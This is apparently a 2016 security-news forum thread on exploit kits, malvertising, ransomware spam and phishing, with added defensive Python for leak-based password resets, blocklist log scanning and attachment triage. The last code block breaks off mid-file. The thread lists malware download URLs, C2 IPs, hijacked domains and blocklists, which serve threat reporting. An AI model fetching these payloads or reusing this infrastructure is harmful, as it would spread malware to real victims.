Angler EK evades EMET; Malvertising - DoubleClick Ad Fraud; Password re-use...
FYI...
Angler EK now evades EMET on Win7 ...
- https://www.fireeye.com/blog/threat-...loit_kite.html
June 06, 2016 - "We recently encountered some exploits from Angler Exploit Kit (EK) that are completely evading Microsoft’s Enhanced Mitigation Experience Toolkit (EMET). This is something we are seeing for the first time in the wild, and we only observed it affecting systems running Windows 7. Angler EK uses complex multi-layered code obfuscation and leverages multiple exploits...
Conclusion: The level of sophistication in exploit kits has increased significantly throughout the years. Where obfuscation and new zero days were once the only additions in the development cycle, evasive code has now been observed being embedded into the framework and shellcode.
Remediation guidance: Although there are no quick solutions for the DEP, EAF, and EAF+ evasion techniques, organizations can mitigate this threat through a robust vulnerability management program for end user systems, which includes the installation of security updates for third party software. Applications such as Adobe Flash, web browsers, and Oracle Java should be patched routinely, prioritizing critical patches, or removed if possible. Because the web browser plays an important role in the infection process, disabling browser plugins for Flash or Silverlight may also reduce the browser attack surface."
- http://arstechnica.com/security/2016...icrosoft-emet/
Jun 6, 2016 - "... there's nothing stopping Angler from using the EMET evasions to install other malicious applications..."
___
Malvertising - DoubleClick Ad Fraud
- https://blog.malwarebytes.org/cyberc...lick-ad-fraud/
June 6, 2016 - "Malvertising isn’t only used to infect users via drive-by downloads or to deceitfully push fake-software-updates. A campaign currently going on via the -TrafficHolder- adult ad platform leverages the promise of raunchy videos to lure people into ad fraud. The trick is simple and yet effective. While browsing, users are automatically redirected to what appears to be YouTube for adult content. The page looks completely normal, except for the fact that it is a giant image slapped across an actual ‘normal’ WordPress website. To the naked eye the large JPEG or GIF looks legit, and curious visitors may be tempted to push the Play button to watch the saucy movie. Rather than playing any content, this click is used to launch a real and paid advert via Google’s DoubleClick. This technique referred to as ‘clickjacking’ is very popular and can take different forms while the end goal remains to generate legitimate-looking clicks on adverts:
> https://blog.malwarebytes.org/wp-con.../06/Flow__.png
The crooks are using hundreds of what appear to be -bogus- (insurance, loans and other scams) WordPress sites to carry out this fraudulent scheme. A simple layer is added on top of the page to give this optical illusion. JavaScript code is able to track mouse movements and knows if the user has actually clicked on the advert... The fake adult image (which covers the whole page) is dynamically generated on the fly and a new one is retrieved randomly from a remote server (5.39.99.215)... that image will disappear after a few seconds of inactivity to reveal the actual underlying WordPress site. The majority of the sites we found were highly suspicious and most likely used for hosting various other spammy content. When users click to play the -bogus- video, their action triggers the ad fraud component of this scam by abusing Google’s DoubleClick... In this particular malvertising instance, users are not put at risk with malicious code, they are simply being duped so that the crooks behind this can generate ad money for each click. However, we have also observed redirections to exploit kits via the same ad platform (TrafficHolder) so you should be extra vigilant and use a proactive line of defence such as exploit protection to avoid getting infected. We have reported this ad fraud to Google and will keep monitoring the situation as one can expect those rogue actors to come up with a different plan to monetize low quality traffic."
5.39.99.215: https://www.virustotal.com/en/ip-add...5/information/
___
Password Re-user? Get Ready to Get Busy
- http://krebsonsecurity.com/2016/06/p...t-to-get-busy/
June 6, 2016 - "In the wake of megabreaches at some of the Internet’s most-recognized destinations, don’t be surprised if you receive password-reset-requests from numerous companies that didn’t experience a breach:
Some big name companies — including Facebook and Netflix — are in the habit of combing through huge data leak troves for credentials that match those of their customers and then forcing a password reset for those users. Netflix .com, for example, sent out a notification late last week to users who made the mistake of re-using their Netflix password at Linkedin, Tumblr or MySpace. All three of those breaches are years old, but the scope of the intrusions (more than a half -billion- usernames and passwords leaked in total) only became apparent recently when the credentials were posted online at various sites and services:
>> http://krebsonsecurity.com/wp-conten...e-580x1031.png
... Netflix is taking this step because it knows from experience that -cybercriminals-will- be using the credentials leaked from Tumblr, MySpace and LinkedIn to see if they work on a variety of third-party sites (including Netflix)... Facebook* also has been known to mine-data-leaked in major external password breaches for any signs that users are re-using their passwords at the hacked entity."
* http://krebsonsecurity.com/2013/11/f...-adobe-breach/
:fear::fear: :mad:
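The leak-mining practice Krebs describes (comb a third-party dump for your own customers, force a reset where the leaked password still works) can be done without ever storing cleartext. The following is an added example, not code from Krebs, Netflix or Facebook; the user records, the leak rows and the PBKDF2 storage scheme are all constructed assumptions for the demo.

```python
# Added example, not from the Krebs post or any named company: how a service
# can mine a third-party credential leak for its own users and force a reset
# where the leaked password still works. All users and leak rows are constructed.
import hashlib
import hmac
import os

PBKDF2_ITERATIONS = 100_000  # assumption: the service stores PBKDF2-HMAC-SHA256 hashes


def hash_password(password: str, salt: bytes) -> bytes:
    """Salted PBKDF2 hash, as a service would store it (never cleartext)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)


def make_user(email: str, password: str) -> dict:
    salt = os.urandom(16)
    return {"email": email.lower(), "salt": salt, "hash": hash_password(password, salt)}


def password_matches(user: dict, candidate: str) -> bool:
    """Constant-time comparison of a candidate against the stored hash."""
    return hmac.compare_digest(user["hash"], hash_password(candidate, user["salt"]))


# Constructed user database for the demo.
USERS = [
    make_user("alice@example.com", "Summer2014!"),          # re-used her leaked password
    make_user("bob@example.com", "correct horse battery"),  # not in any leak
    make_user("carol@example.com", "hunter2-netflix"),      # leaked elsewhere, different here
]

# Constructed third-party leak: e-mail -> cleartext password as recovered from
# an old dump (the LinkedIn/MySpace/Tumblr situation in the post).
LEAK = {
    "alice@example.com": "Summer2014!",
    "carol@example.com": "hunter2",
    "dave@example.com": "password1",    # not a customer of this service
}


def find_reused_credentials(users: list, leak: dict) -> list:
    """E-mails of users whose *current* password equals the one leaked for them.

    Only the service's own salted hash is consulted: the leaked cleartext is
    hashed with the user's salt and compared, so nothing is reversed or stored."""
    return [u["email"] for u in users
            if u["email"] in leak and password_matches(u, leak[u["email"]])]


def force_reset(users: list, emails: list) -> int:
    """Invalidate the stored hash for each hit so the next login must go through reset."""
    targets = set(emails)
    count = 0
    for u in users:
        if u["email"] in targets:
            u["hash"] = b""          # no candidate can ever match an empty hash
            u["must_reset"] = True
            count += 1
    return count


if __name__ == "__main__":
    hits = find_reused_credentials(USERS, LEAK)
    print("forced resets:", force_reset(USERS, hits), hits)
```

The match is done per user with that user's own salt, so a leak of ten million rows costs one PBKDF2 evaluation per row that names a customer, and the leaked cleartext never needs to be written anywhere.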
'Mega' breach - password check...
FYI...
LinkedIn breach data Used for Malicious E-Mails
- https://isc.sans.edu/diary.html?storyid=21139
2016-06-07 - "Yesterday, the German federal CERT (CERT-BUND) warned of phishing e-mails that are more plausible by using data that appears to originate from the recently leaked LinkedIn data set. The e-mails address the recipient by full name and job title. Typically, the attachments claim to contain an invoice. We have since received a couple of users who reported receiving e-mails that match the pattern. For example:
> https://isc.sans.edu/diaryimages/ima...44_56%20AM.png
The e-mails arrive in different languages. They address the recipient by full name, job title and company name, to make the e-mail more plausible. This is similar to the way social media was used in the past to create more convincing phishing e-mails. For example, see this old article from 3 years ago* about how Facebook data is used in this way. With the LinkedIn leak, data has become available that wasn't reachable by simple screen scrapers (or API users) in the past."
* https://isc.sans.edu/diary.html?storyid=15265
2013-02-25
___
TeamViewer confirms number of abused user accounts is “significant”
- http://arstechnica.com/security/2016...-account-hack/
Jun 5, 2016 - "It was a tough week for TeamViewer, a service that allows computer professionals and consumers to log into their computers from remote locations. For a little more than a month, a growing number of users have reported their accounts were accessed by criminals who used their highly privileged position to drain PayPal and bank accounts. Critics have speculated TeamViewer itself has fallen victim to a breach that's making the mass hacks possible. On Sunday, TeamViewer spokesman Axel Schmidt acknowledged to Ars that the number of takeovers was 'significant', but he continued to maintain that the compromises are the result of user passwords that were compromised through a cluster of recently exposed megabreaches involving more than 642 million passwords belonging to users of LinkedIn, MySpace, and other services..."
- http://www.zdnet.com/article/teamvie...k-significant/
"... If you think you may have been involved in the breach, check HaveIbeenPwned* and change your passwords as soon as possible..."
* https://haveibeenpwned.com/
:fear::fear: :mad:
Fake 'résumé' SPAM, Tax refund – Phish
FYI...
Fake 'résumé' SPAM - drops Cerber ransomware
- http://blog.dynamoo.com/2016/06/malw...sume-spam.html
8 June 2016 - "This -fake- résumé spam leads to malware:
From: Dora Bain
Date: 7 June 2016 at 03:37
Subject: Good morning
What's Up?
I visited your website today..
I'm currently looking for work either full time or as a intern to get experience in the field.
Please look over my CV and let me know what you think.
With gratitude,
Dora Bain
In the sample I saw, the attached file was named Dora-Resume.doc and had a VirusTotal detection rate of 11/56*. The Malwr report** and Hybrid Analysis*** show that a -script- executes that tries to make a political statement along the way.. This downloads a file from 80.82.64.198 /subid1.exe which is then saved as %APPDATA%\us_drones_kills_civilians.exe which VirusTotal gives a detection rate of 20/56[4] and seems to give an overall diagnosis as being Cerber ransomware. The IP address of 80.82.64.198 is allocated to an apparent Seychelles shell company called Quasi Networks Ltd (which is probably Russian). There seems to be little if anything of value in 80.82.64.0/24 which could be a good candidate to block. Incidentally, the IP hosts best-booters .com which is likely to be a DDOS-for-hire site. According to the VT report[5] the malware scans for a response on port 6892 on the IP addresses 85.93.0.0 through to 85.93.63.255. However, this Hybrid Analysis[6] indicates that the only server to respond is on 85.93.0.124 (GuardoMicro SRL, Romania) which is part of the notoriously bad 85.93.0.0/24 which is a good thing to block. That report also shows traffic to ipinfo .io which is a legitimate "what is my IP" service. While not malicious in its own right, it does make a potentially good indicator of compromise.
Recommended blocklist:
80.82.64.0/24
85.93.0.0/24 "
* https://virustotal.com/en/file/3b825...is/1465377335/
** https://malwr.com/analysis/MjAwOWJjM...M0ODJlYWI5N2E/
*** https://www.hybrid-analysis.com/samp...ironmentId=100
4] https://virustotal.com/en/file/87d80...is/1465377604/
TCP connections
52.29.28.100: https://www.virustotal.com/en/ip-add...0/information/
5] https://virustotal.com/en/file/87d80...is/1465377604/
TCP connections
52.29.28.100
6] https://www.hybrid-analysis.com/samp...ironmentId=100
___
Automated tax refund notification – Phish
- https://myonlinesecurity.co.uk/autom...tion-phishing/
8 June 2016 - "One of the frequent subjects in a phishing attempt is 'Tax returns' or 'tax refunds', where, especially in the UK, you need to submit your Tax Return online. The phishers have caught on to the fact that in the UK -all- government services are now dealt with by a common gateway and you need to register for a Government Gateway account. This one wants your personal details and your credit card and bank details...
Screenshot: https://myonlinesecurity.co.uk/wp-co...h-1024x428.png
If you follow the link: http ://americasfootcenter .com/automated.refund.application.online.start.account.for.special.refund/1255bbc5b01e0284db618c7bc75d643c/registration.php?ip=[redacted]
.. you see a webpage asking for name, address, birth date etc. looking like:
> https://myonlinesecurity.co.uk/wp-co...h-1024x560.png
.. Then you are asked for your address and mobile number:
> https://myonlinesecurity.co.uk/wp-co...2-1024x461.png
.. Next credit card details:
> https://myonlinesecurity.co.uk/wp-co...ay_phish_3.png
.. Next is Bank details:
> https://myonlinesecurity.co.uk/wp-co...ay_phish_4.png
.. Next is a 'done' page, where you are told that it will take 5 to 7 days to deal with and give you the refund. You are then automatically forwarded to the genuine gov .uk start page:
> https://myonlinesecurity.co.uk/wp-co...ay_phish_5.png
All of these emails use social engineering tricks to persuade you to open the attachments that come with the email... whether it is a straightforward attempt, like this one, to -steal- your personal, bank, credit card or email and social networking log in details..."
americasfootcenter .com: 50.87.146.116: https://www.virustotal.com/en/ip-add...6/information/
>> https://www.virustotal.com/en/url/d4...c4cc/analysis/
>> https://www.virustotal.com/en/url/34...3d87/analysis/
:fear::fear: :mad:
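The Cerber post above ends with a recommended blocklist and a handful of network indicators (probes on port 6892 into 85.93.0.0 through 85.93.63.255, a lookup of ipinfo .io). As an added example that is not part of the Dynamoo post, here is how those indicators can be applied to outbound-connection logs. The CIDRs, the IPs 80.82.64.198 and 85.93.0.124 and the port come from the post; the log format, the host names and the other addresses in the sample are constructed.

```python
# Added example, not from the Dynamoo post: apply the post's recommended
# blocklist (80.82.64.0/24 and 85.93.0.0/24) and the other indicators it
# describes (probes on port 6892 into 85.93.0.0-85.93.63.255, lookups of
# ipinfo.io) to outbound-connection log lines. The log format and the log
# lines themselves are constructed for the demo.
import ipaddress
import re

BLOCKLIST = [ipaddress.ip_network("80.82.64.0/24"),
             ipaddress.ip_network("85.93.0.0/24")]
PROBE_PORT = 6892
# 85.93.0.0 .. 85.93.63.255 is exactly 85.93.0.0/18
PROBE_RANGE = (ipaddress.ip_address("85.93.0.0"), ipaddress.ip_address("85.93.63.255"))
WEAK_INDICATOR_SNI = {"ipinfo.io"}   # legitimate service; only meaningful with other hits

# Constructed log format: "<timestamp> host=<name> dst=<ip>:<port> [sni=<name>]"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) dst=(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)"
    r"(?: sni=(?P<sni>\S+))?$"
)

SAMPLE_LOG = """\
2016-06-08T09:12:01Z host=ws-17 dst=80.82.64.198:80
2016-06-08T09:12:04Z host=ws-17 dst=85.93.0.124:6892
2016-06-08T09:12:05Z host=ws-17 dst=85.93.12.7:6892
2016-06-08T09:12:09Z host=ws-17 dst=203.0.113.10:443 sni=ipinfo.io
2016-06-08T09:15:00Z host=ws-03 dst=93.184.216.34:443 sni=example.com
this line is garbage and is skipped
"""


def classify(line: str):
    """Return (host, dst_ip, [reasons]) or None if the line matches no indicator."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip = ipaddress.ip_address(m["ip"])
    port = int(m["port"])
    reasons = []
    for net in BLOCKLIST:
        if ip in net:
            reasons.append(f"destination in blocklisted {net}")
    if port == PROBE_PORT and PROBE_RANGE[0] <= ip <= PROBE_RANGE[1]:
        reasons.append("port 6892 probe into 85.93.0.0/18 (Cerber scan pattern)")
    if m["sni"] in WEAK_INDICATOR_SNI:
        reasons.append(f"lookup of {m['sni']} (legitimate service, weak indicator)")
    return (m["host"], str(ip), reasons) if reasons else None


def scan(log_text: str) -> list:
    """All flagged lines in order; each entry is (host, dst_ip, reasons)."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]


def hosts_needing_triage(log_text: str) -> dict:
    """host -> number of flagged connections, so responders can prioritise."""
    counts = {}
    for host, _ip, _reasons in scan(log_text):
        counts[host] = counts.get(host, 0) + 1
    return counts


if __name__ == "__main__":
    for host, ip, reasons in scan(SAMPLE_LOG):
        print(host, ip, "; ".join(reasons))
    print(hosts_needing_triage(SAMPLE_LOG))
```

The ipinfo .io hit is kept separate from the blocklist hits on purpose: on its own it proves nothing, which is why the post calls it only a "potentially good" indicator, but on a host that also probed port 6892 it strengthens the case.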
Fake 'Fedex' SPAM, Macro-Based Malware, 'Google Dorking'
FYI...
'Chat' for Ransom Attempts
- http://blog.trendmicro.com/trendlabs...nsom-attempts/
June 9, 2016 - "... The innovation brought forth by some new JIGSAW variants? Instead of using dark web sites, it communicates to the user via… live chat. The threats displayed by these new variants (detected as Ransom_JIGSAW.H) are similar to those shown by the earlier JIGSAW variants...
JIGSAW ransom note: https://blog.trendmicro.com/trendlab...06/jigsaw1.png
One big difference should be apparent: there is now a link which appears to go to a live chat session:
> https://blog.trendmicro.com/trendlab...06/jigsaw3.png
The attackers actually have people standing by to answer questions... The cybercriminals behind this JIGSAW variant didn’t build their own chat client; instead they used onWebChat, a publicly available chat platform. A script that calls the onWebChat client is embedded in the website. The connection to onWebchat’s servers is protected with SSL/TLS, making packet capture and interception more difficult in the absence of a proxy intercepting encrypted traffic. We have reached out to onWebChat and informed them of this issue.
Interestingly, the cybercriminal on the other end of the chat conversation doesn’t actually know when the user was infected. The “timer” is only based on a cookie set on the affected machine – if this cookie is deleted, the countdown resets to 24 hours. As a result, the cybercriminals are actually reliant on the user’s honesty when it comes to finding out how much ransom should be paid! There are some perverse incentives at work for cybercriminals to decide to focus on their “customers” (i.e., victims) in this way. Whatever those incentives may be, the victims of this crime now have an immediate, human voice to go to when their files are encrypted. This may predispose them to pay up if they are victimized – something we do not encourage. One more thing to note. While looking into the site hosting this instant chat, we found a -second- piece of malware that used the same site. This one, however, was “only” lockscreen malware, which can be bypassed and removed by booting into safe mode... This kind of “customer-centric” approach to ransomware is unusual, although not entirely unprecedented... Users can likewise take advantage of our free tools such as the Trend Micro Lock Screen Ransomware Tool*, which is designed to detect and remove screen-locker ransomware; as well as Trend Micro Crypto-Ransomware File Decryptor Tool**, which can decrypt certain variants of crypto-ransomware without paying the ransom or the use of the decryption key..."
* https://esupport.trendmicro.com/en-u...t/1105975.aspx
** https://esupport.trendmicro.com/solu...S/1114221.aspx
___
Fake 'Fedex' SPAM - leads to Andromeda
- http://blog.dynamoo.com/2016/06/malw...ent-fedex.html
8 June 2016 23:21 - "This fake FedEx (or FeDex?) spam has a malicious attachment:
From: Secure-FeDex
Date: 8 June 2016 at 18:17
Subject: David Bernard agent Fedex
Deаr [redacted] ,
We tried tо delivеr уour item on June 08th, 2016, 10:45 АM.
The delivеry attempt failеd because thе аddress was business сlоsed оr nobodу сould sign fоr it.
Тo piсk up the package, please, рrint the receipt that is аttаchеd to this еmаil and visit FеdEx
office indicated in the invoice. If the pасkagе is nоt piсkеd up within 24 hоurs, it will bе returnеd to thе shipper.
Receipt Number: 98402839289
Eхpесted Delivеrу Dаte: June 08th, 2016
Class: Intеrnаtional Paсkаge Sеrviсe
Servicе(s): Delivеrу Cоnfirmation
Status: Notifiсatiоn sent
Thank you for choosing our service ...
In this case there was an attachment FedEx_track_98404283928.zip which unzipped into a folder FedEx_track_98404283928 containing in turn a -malicious-script- FedEx_track_98404283928.js which (according to Malwr*) attempts to download a binary from one of the following locations:
www .brusasport .com/Brusa/vario/direct/teamviiverupdate2918372.exe
www .microsoft .com/Brusa/vario/direct/teamviiverupdate2918372.exe
www .mega .net/Brusa/vario/direct/teamviiverupdate2918372.exe
www .google .com/Brusa/vario/direct/teamviiverupdate2918372.exe
www .yahoo .com/Brusa/vario/direct/teamviiverupdate2918372.exe
Only the first one is a valid download location, the rest are a smokescreen. The dropped binary has a detection rate of 5/56** but automated analysis [1] [2] [3] is inconclusive. However those reports do seem to indicate attempted network traffic to:
secure .adnxs.metalsystems .it
upfd .pilenga .co.uk
These two subdomains appear to have been hijacked from unrelated Register.IT customers and are hosted on a questionable-looking customer of OVH Italy on 188.165.157.176 ... Other -hijacked- subdomains on the same IP are:
tgr .tecnoagenzia .eu
bmp.pilenga .co.uk
maps.pilenga .co.uk
sundication .twitter.luigilatruffa .com
tit.pilenga .net
trw.pilenga .net
ocsp.pilenga .net
plda.pilenga .net
maps.pilenga .mobi
plda.pilenga .mobi
This Tweet[4] from @pancak3lullz indicates that this IP is associated with Andromeda rather than the usual recent patterns of Locky or Dridex (which has.. err.. dried up recently). It appears to have been a malicious IP for more than a month[5]. Of interest is that almost every part of this chain (including the spam sending IP of 31.27.229.22) is in Italy. As with a great deal of recent spam, this is delivered via a .js script in a ZIP file. If you can configure your mail filters to reject such things then you will be a whole lot safer.
Recommended blocklist:
188.165.157.176/30 "
* https://malwr.com/analysis/ZDViYmNjM...I0MGIxODc3OTU/
** https://www.virustotal.com/en/file/0...is/1465421690/
1] https://malwr.com/analysis/OGMxMzE5N...MxYTEyZmM0YmQ/
2] https://sandbox.deepviz.com/report/h...1f8fa82586980/
3] https://www.hybrid-analysis.com/samp...ironmentId=100
4] https://twitter.com/pancak3lullz/sta...91468238983168
5] https://malwr.com/analysis/N2I4YWZlZ...hlOGJlODE3MGI/
___
Increased Risks from Macro-Based Malware
- https://www.us-cert.gov/ncas/current...-Based-Malware
June 09, 2016 - "Microsoft Office applications use macros to automate routine tasks. However, macros can contain malicious code that can be used to exploit vulnerable systems. Recently, there has been a resurgence of malware that is spread via macros. Individuals and organizations should proactively secure systems against macro-based malware. Users and administrators are encouraged to review CERT's article (link* is external) on the resurgence of macro exploitation and apply recommendations outlined in CERT Australia's report** on macro security."
* https://insights.sei.cmu.edu/cert/20...ve-macros.html
June 8, 2016
** http://www.asd.gov.au/publications/p...o_Security.pdf
___
Google Dorking ...
Google Dorking sounds harmless, but it can take your company down. Here's what you need to know to avoid being hacked
- http://www.darkreading.com/cloud/goo...a/d-id/1325842
6/9/2016
> http://www.darkreading.com/cloud-security.asp
- http://arstechnica.com/security/2016...esearch-finds/
Jun 9, 2016 - "About 11 percent of shared cloud folders contain nasty surprises, according to recent research..."
___
Rotten Apples: Apple-like Malicious Phishing Domains
- https://www.fireeye.com/blog/threat-...les_apple.html
June 07, 2016 - "At FireEye Labs we have an automated system designed to proactively detect newly registered malicious domains. This system observed some -phishing- domains registered in the first quarter of 2016 that were designed to appear as legitimate Apple domains. These -phony-Apple-domains- were involved in phishing attacks against Apple iCloud users in China and UK. In the past we have observed several phishing domains targeting Apple, Google and Yahoo users; however, these campaigns are unique as they are serving the same malicious phishing content from different domains to target Apple users. Since January 2016 we have observed several phishing campaigns targeting the Apple IDs and passwords of Apple users. Apple provides all of its customers with an Apple ID, a centralized personal account that gives access to iCloud and other Apple features and services such as the iTunes Store and App Store. Users will provide their Apple ID to sign in to iCloud[.]com, and use the same Apple ID to set up iCloud on their iPhone, iPad, iPod Touch, Mac, or Windows computer..."
(More detail at the fireeye URL above.)
:fear::fear: :mad:
Malvertising: How to beat bad ads
FYI...
Malvertising: How to beat bad ads
- https://blog.malwarebytes.org/101/20...-beat-bad-ads/
June 13, 2016 - "... Malvertising, or malicious advertising, is the use of online advertising to distribute malware with little to no user interaction required. You could be researching business trends on a site like NYTimes .com and, without ever having clicked on an ad, be in trouble. A tiny piece of code hidden deep in the ad [re]directs your computer to criminal servers. These servers catalog details about your computer and its location, and then select the 'right' malware for you... the problem’s only getting worse. In 2015, Google disabled more than 780 million bad ads, a nearly 50% increase over 2014. According to RiskIQ*, in just the first half of 2015, malvertising increased 260% compared against all of 2014... infected ads often use an iframe, or invisible webpage element, to do its work. You don’t even need to click on the ad to activate it — just visit the webpage hosting the ad. (Hence the term 'drive-by download'). The iframe redirects to an exploit landing page, and malicious code attacks your system from the landing page via exploit. The exploit kit delivers malware — and 70 percent of the time, it’s ransomware..."
(More detail at the malwarebytes URL above.)
* https://www.riskiq.com/blog/riskiq-l...g/malvertising
:fear::fear: :mad:
JS email attachments, Advanced phishing tactics
FYI...
Do NOT run JS email attachments ...
- http://www.infoworld.com/article/308...ansomware.html
Jun 14, 2016 - "Attackers are infecting computers with a new ransomware program called RAA that's written entirely in -JavaScript- and locks users' files by using strong encryption. Most malware programs for Windows are written in compiled programming languages like C or C++ and take the form of portable executable files such as .exe or .dll. Others use command-line scripting such as Windows batch or PowerShell. It's rare to see client-side malware written in web-based languages such as JavaScript, which are primarily intended to be interpreted by browsers. Yet the Windows Script Host, a service built into Windows, can natively execute .js and other scripting files out of the box. Attackers have taken to this technique in recent months, with Microsoft warning about a spike in malicious email attachments containing JavaScript files back in April. Last month, security researchers from ESET warned of a wave of spam that distributes the Locky ransomware through .js attachments. In both of those cases the JavaScript files were used as malware downloaders - scripts designed to download and install a traditional malware program. In the case of RAA, however, the whole ransomware is written in JavaScript. According to experts from tech support forum BleepingComputer*, RAA relies on CryptoJS, a legitimate JavaScript library, to implement its encryption routine. The implementation appears to be solid, using the AES-256 encryption algorithm..."
* http://www.bleepingcomputer.com/news...ng-javascript/
___
Advanced phishing tactics used to steal PayPal credentials
- https://blog.malwarebytes.org/cyberc...l-credentials/
June 14, 2016 - "Phishers are back to using an old tactic in a -new- fashion to get hold of their victims’ credentials. One of the first lessons you will learn during anti-phishing training is to hover over the links in a mail to see if they point to the site where you would expect them to point. Although good advice, this is NOT a guarantee that you are going to be safe. Always visit sites directly, never follow the URLs presented to you in emails-or-attachments... As reported by UK malware researcher @dvk01uk*, the phishers are using -Javascript- to send the user to the promised PayPal site while the login credentials are being-sent-to-an-entirely-different domain:
> https://twitter.com/dvk01uk/status/742233789531852800
'The javascript runs as soon as the page (HTML attachment) is loaded and -intercepts- all posts to PayPal .com and -diverts- them to the actual phishing page to accept all your details, if you are unwise enough to fall for this trick.'
In this case, the phish was pointing to PayPal and the phishing page is www[dot]egypt-trips[dot]co which appears to be an unused WordPress site. (We have informed the registrant of the phish, so we hope they will take appropriate measures)... The original blogpost about this particular phish, including screenshots and code snippets, can be found here:
> https://myonlinesecurity.co.uk/very-...ishing-attack/
egypt-trips[dot]co: 160.153.162.9: https://www.virustotal.com/en/ip-add...9/information/
>> https://www.virustotal.com/en/url/6e...189e/analysis/
>> https://www.virustotal.com/en/url/91...59af/analysis/
>> https://www.virustotal.com/en/url/77...97d0/analysis/
:fear::fear: :mad:
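The Malwarebytes post makes the point that hovering over links is not enough when an HTML attachment carries script that rewires the form after it loads. As an added example, not code from Malwarebytes, @dvk01uk or the original blog post, the triage script below parses such an attachment and reports the three things worth checking: where each link really points, where each form really posts, and whether inline script changes a form's target or names a host outside the brand being imitated. The sample attachment and the host login-verify.example are constructed for the demo; only PayPal is assumed as the imitated brand.

```python
# Added example, not from the Malwarebytes post or @dvk01uk: triage of an HTML
# e-mail attachment for the tricks the post describes. The HTML sample and the
# host login-verify.example are constructed for the demo.
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

EXPECTED_HOSTS = {"paypal.com", "www.paypal.com"}   # the brand the mail claims to be
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)


def host_of(url: str) -> str:
    return (urlparse(url.strip()).hostname or "").lower()


def is_expected(host: str, expected=EXPECTED_HOSTS) -> bool:
    return any(host == e or host.endswith("." + e) for e in expected)


class _Collector(HTMLParser):
    """Gather anchors (href, visible text), form actions and inline script bodies."""
    def __init__(self):
        super().__init__()
        self.links, self.forms, self.scripts = [], [], []
        self._anchor = None
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a":
            self._anchor = [a.get("href") or "", ""]
        elif tag == "form":
            self.forms.append(a.get("action") or "")
        elif tag == "script":
            self._in_script = True

    def handle_data(self, data):
        if self._anchor is not None:
            self._anchor[1] += data
        if self._in_script:
            self.scripts.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._anchor is not None:
            self.links.append(tuple(self._anchor))
            self._anchor = None
        elif tag == "script":
            self._in_script = False


def triage(html: str, expected=EXPECTED_HOSTS) -> list:
    """Findings as (category, detail) tuples; an empty list means nothing odd was seen."""
    c = _Collector()
    c.feed(html)
    c.close()
    findings = []
    for href, text in c.links:
        target = host_of(href)
        m = URL_RE.search(text)                     # a URL shown as the link text
        shown = host_of(m.group(0)) if m else ""
        if shown and shown != target:
            findings.append(("link-text-mismatch", f"text shows {shown}, href goes to {target or '?'}"))
        if target and not is_expected(target, expected):
            findings.append(("link-offbrand", target))
    for action in c.forms:
        h = host_of(action)
        if h and not is_expected(h, expected):
            findings.append(("form-offbrand", f"posts to {h}"))
    for body in c.scripts:
        if re.search(r"\.action\s*=|addEventListener\(\s*['\"]submit", body):
            findings.append(("script-rewires-form", "inline script changes where the form submits"))
        for url in URL_RE.findall(body):
            h = host_of(url)
            if h and not is_expected(h, expected):
                findings.append(("script-offbrand-host", h))
    return findings


# Constructed attachment in the style the post describes: link and form both
# point at PayPal (hovering looks fine), but script run at load time diverts the POST.
SAMPLE_ATTACHMENT = """
<html><body>
<p>Please <a href="https://www.paypal.com/signin">log in at https://www.paypal.com/signin</a> to restore access.</p>
<form id="login" action="https://www.paypal.com/cgi-bin/webscr" method="post">
  <input name="login_email"><input name="login_password" type="password">
  <input type="submit" value="Log In">
</form>
<script>
  document.getElementById('login').action = 'http://login-verify.example/collect.php';
</script>
</body></html>
"""

if __name__ == "__main__":
    for category, detail in triage(SAMPLE_ATTACHMENT):
        print(f"{category:22} {detail}")
```

On the sample, the link and the form both pass, and only the script checks fire, which is exactly the case the post warns about: the hover test alone would have said the attachment was clean.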
Locky/Dridex trying to come back
FYI...
Locky/Dridex trying to come back
- https://myonlinesecurity.co.uk/locky...-to-come-back/
16 June 2016 - "Since yesterday 15 June 2016, we have been hearing about a slow but steady trickle of Locky ransomware / Dridex banking Trojan -JavaScript- downloaders inside zip file attachments. The first ones I received on my mail server were at about 4 am UTC today. I am pretty sure these are only test mails, because the JavaScript is so well detected and the site linked to inside the JavaScript is a site that was seen several weeks ago & is currently down, although appears to have still been active yesterday at some stage. The emails that I am currently seeing this morning are very basic and simple, but they do always catch the unwary or curious user. They are all pretending to come from various yahoo email addresses with a subject of Photos and a completely blank / -empty- email body. One of the emails looks like:
From: Mitchell <Mitchell842@ yahoo .com>
Date: Thu 16/06/2016 05:55
Subject: Photos
Attachment: Photo.zip
Body content: Blank/Empty
All copies I have seen so far today contain exactly the same docment_380578378.js inside the photo.zip (VirusTotal Detections 35/55*). Payload Security** shows the download was from shivshanti .in/n78f7gbniu (VirusTotal detections 46/55***) which shows the same file from 2 weeks ago before the Necurs botnet went down and Locky was unable to spread with its previous intensity. It looks like our short holiday from the onslaught of email delivered malware has come to an end and we should all be prepared for a massive attack over the next few days."
* https://www.virustotal.com/en/file/5...is/1466045706/
** https://www.hybrid-analysis.com/samp...ironmentId=100
Contacted Hosts
43.242.215.197
85.17.19.102
195.154.69.90
93.170.123.60
95.211.174.92
*** https://www.virustotal.com/en/file/0...is/1466045706/
shivshanti .in: 43.242.215.197: https://www.virustotal.com/en/ip-add...7/information/
>> https://www.virustotal.com/en/url/71...c29b/analysis/
:fear::fear: :mad:
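Both the FedEx/Andromeda post (a .js inside FedEx_track_98404283928.zip) and the Locky post above (docment_380578378.js inside Photo.zip) end with the same advice: have the mail filter reject ZIP attachments that carry scripts. As an added example that is not code from either blog, the check below opens a ZIP in memory, walks its members (including ZIPs nested inside ZIPs and double extensions such as .jpg.js) and says whether the attachment should be rejected. The archives are constructed in memory; their member names echo the samples in the posts, and the extension list is an assumption about what Windows will execute on double-click.

```python
# Added example, not from the Dynamoo or myonlinesecurity posts: a mail-filter
# check that rejects ZIP attachments carrying script files (the .js-in-ZIP
# pattern behind the FedEx/Andromeda and Locky spam above), including double
# extensions and ZIPs nested inside ZIPs. The attachments are constructed in
# memory; member names echo the posts' samples.
import io
import posixpath
import zipfile

# Extensions Windows Script Host or the shell will execute directly (assumption).
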